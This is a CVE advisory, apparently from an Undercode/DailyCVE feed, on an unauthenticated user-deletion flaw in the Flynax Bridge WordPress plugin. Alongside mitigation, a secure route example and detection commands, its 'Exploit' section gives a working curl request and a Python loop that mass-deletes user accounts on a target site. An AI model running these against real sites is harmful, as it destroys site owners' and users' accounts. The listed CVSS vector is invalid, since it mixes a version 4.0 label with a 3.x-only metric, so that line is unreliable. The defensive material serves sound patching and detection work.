How CVE-2025-4177 Works
The Flynax Bridge plugin for WordPress does not perform a capability check in its `deleteUser()` function, so an unauthenticated attacker can trigger user deletion with a crafted HTTP request. The root cause is missing access control on the plugin's REST API endpoint: the handler accepts any caller that supplies a target user ID, without verifying that the caller is logged in or may delete users. Because the endpoint also lacks CSRF protection, the request can be repeated across user IDs to delete accounts in bulk.
DailyCVE Form
Platform: WordPress
Version: ≤ 2.2.0
Vulnerability: Unauthenticated user deletion
Severity: Critical
Date: 05/06/2025
What Undercode Say:
Exploit:
1. Craft a POST request to `/wp-json/flynax/users/delete`:
curl -X POST "http://target.com/wp-json/flynax/users/delete" -d "user_id=1"
2. Automated mass deletion script (Python):
import requests

for uid in range(1, 100):
    requests.post("http://target.com/wp-json/flynax/users/delete", data={"user_id": uid})
Protection:
1. Immediate mitigation (tightens file permissions only; it does not close the unauthenticated endpoint, so deactivate the plugin or block the route until 2.2.1 is installed):
chmod -R 755 /wp-content/plugins/flynax-bridge/
2. Add capability check in `deleteUser()`:
if (!current_user_can('delete_users')) { wp_die('Unauthorized'); }
3. Web-server rule to block the endpoint (nginx location block; note that `deny all` also blocks legitimate administrators, so treat it as a stopgap until the patch is applied):
location ~ /wp-json/flynax/users/delete { deny all; }
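As an added example (not the Flynax Bridge plugin's own code), here is how a deletion route should be registered with WordPress so that the capability check from step 2 runs in a `permission_callback` before the handler is reached; the namespace, route and function names are assumptions:

```php
<?php
// Added example, not the plugin's code: namespace, route and handler name are assumed.
add_action( 'rest_api_init', function () {
    register_rest_route( 'flynax/v1', '/users/delete', array(
        'methods'  => 'POST',
        'callback' => 'example_delete_user',
        // The check missing in CVE-2025-4177. Without a permission_callback every
        // caller, anonymous ones included, reaches the handler.
        'permission_callback' => function ( WP_REST_Request $request ) {
            // Core treats a cookie session without a valid X-WP-Nonce as logged out,
            // so this single check covers both the unauthenticated and the CSRF case.
            $uid = (int) $request['user_id'];
            // 'delete_user' is the per-target meta capability; it maps onto 'delete_users'.
            return current_user_can( 'delete_user', $uid );
        },
        'args' => array(
            'user_id' => array(
                'required'          => true,
                'validate_callback' => function ( $value ) {
                    return is_numeric( $value ) && (int) $value > 0;
                },
                'sanitize_callback' => 'absint',
            ),
        ),
    ) );
} );

function example_delete_user( WP_REST_Request $request ) {
    // wp_delete_user() lives in an admin include that is not loaded on REST requests.
    require_once ABSPATH . 'wp-admin/includes/user.php';
    $uid = (int) $request['user_id'];
    if ( $uid === get_current_user_id() ) {
        return new WP_Error( 'self_delete', 'Cannot delete your own account.', array( 'status' => 400 ) );
    }
    if ( ! wp_delete_user( $uid ) ) {
        return new WP_Error( 'not_found', 'No such user.', array( 'status' => 404 ) );
    }
    return rest_ensure_response( array( 'deleted' => $uid ) );
}
```

Anonymous callers are rejected by WordPress with a 401 before `example_delete_user()` runs, and cookie-authenticated callers without a nonce are treated the same way.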
Detection:
1. Log analysis for repeated POSTs to `/flynax/users/delete`:
grep "POST /wp-json/flynax/users/delete" /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -rn
2. WordPress audit plugin query (the `deleted` flag is the audit plugin's, not a core column; core WordPress removes the `wp_users` row outright):
SELECT * FROM wp_users WHERE deleted = 1;
Patch:
Upgrade to Flynax Bridge 2.2.1+.
Impact Metrics:
- CVSS:4.0 AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H
- Exploitability: Low complexity, no privileges required.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode